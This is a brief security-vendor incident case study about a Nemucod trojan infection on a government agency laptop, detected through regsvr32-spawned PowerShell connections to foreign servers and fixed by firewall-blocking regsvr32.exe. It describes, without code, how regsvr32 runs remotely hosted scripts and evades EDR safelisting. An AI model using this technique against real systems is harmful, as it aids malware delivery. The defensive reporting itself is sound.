Nemucod Nailed in the Network

The Network: A state government agency that performs financial audits of other government departments.
 
The Expectation: Employee laptops are properly imaged and secured with brand-name, up-to-date Anti-Virus (AV). Some employees may take the machines home as part of their job function.
 
The Catch: During working hours, a particular laptop was observed making numerous connections to webservers in foreign destinations including Pakistan, Vietnam, Iran, and Serbia on ports 80 and 443 which were permitted by the firewall. The connections were being attempted by a power shell script and not a browser. Worse yet, the parent process was regsvr32.exe. The network owner was immediately notified of this behavior and the specific laptop involved. It was pulled from the network and a forensics investigation commenced.
 
The Find: While away from the network, the user had chosen to browse unsafe websites which had resulted in the download of the Trojan Nemucod. The Trojan was trying to install ransomware using a jscript installer, a not commonly known feature of Regsvr32 which can execute specially crafted scripts on a remote host using a URL. These scripts are XML files that contain embedded Jscript or VBScript scripts that will be executed when Regsvr32 runs the script. This technique evades the safelisting capabilities of Netsurion Endpoint Detection and Response (EDR).
 
The Fix: Unfortunately, Microsoft has remained silent regarding Regsvr32’s ability to execute scripts from a remote URL. As it is not known whether this will be patched or not, it is important to block Regsvr32.exe’s access to the network through a software firewall. If you do not have a firewall installed that can block an executable from reaching the internet, you can use the Windows Firewall to do this.
 
The Lesson: A layered approach to security saved the day. Despite the malware taking root on the laptop, a properly configured firewall blocked attempts to reach the Command and Control (C&C) servers. Netsurion’s SOC alerted the network owner who was able to disinfect the laptop.